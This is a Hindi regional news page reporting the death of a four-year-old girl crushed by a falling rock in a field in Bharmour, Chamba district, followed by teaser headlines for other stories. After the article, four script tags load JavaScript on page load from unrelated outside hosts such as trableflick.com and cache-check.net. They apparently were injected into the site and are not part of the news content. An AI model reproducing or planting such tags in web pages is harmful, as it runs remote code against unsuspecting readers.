<p>जिला चंबा के भरमौर की उलांसा पंचायत में एक दर्दनाक हादसा सामने आया है। जानकारी के अनुसार बीते कल यानि सोमवार सुबह खेत में खेल रही चार साल की मासूम चट्टान के चपेट में आ गई जिससे उसकी मौत हो गई। बच्ची की पहचान शीतल कुमारी पुत्री प्रवीण कुमार निवासी भरमौर के रूप में हुई है। इस घटना की सूचना पुलिस को दी गई। पुलिस ने घटना के संदर्भ में मामला दर्ज कर आगामी कार्यवाही शुरू की। </p>
<p>बताया जा रहा है कि चार साल की मासूम बच्ची ननिहाल आई थी। सोमवार को वह घर के साथ लगते खेत में बच्चों के साथ खेल रही थी। ऐसे में वह फिसलकर आई एक चट्टान के नीचे दब गई। परिजन बच्ची को तुरंत अस्पताल ले गए। यहां डॉक्टरों ने उसे मृत घोषित कर दिया। डीएसपी चंबा अजय शर्मा ने मामले की पुष्टि करते हुए कहा कि पुलिस मामले की छानबीन कर रही है। वहीं, तहसीलदार भरमौर ने मौके पर पहुंचकर मृतक के परिजनों को 10 हजार रुपये की फौरी राहत प्रदान की है।</p>
<p><img src=”/media/gallery/images/image(6102).jpeg” style=”height:432px; width:400px” /></p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1591070457773″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Hamirpur: उपमंडल बड़सर के बिझडी बाजार में उस समय अफरा तफरी का माहौल बन…
Mandi:खड्गे और जेपी नड्डा की पत्रवार के बीच मंडी से भाजपा सांसद और एक्ट्रेस…
Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार को…
Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार…
UP: दुष्कर्म का आरोपी और जमानत पर जेल से बाहर आए एक व्यक्ति ने दुष्कर्म…
Nahan/Hamirpur: राज्य कार्यकारिणी के आह्वान पर अपनी मांगों को पेंशनरों ने जिला मुख्यालयों में…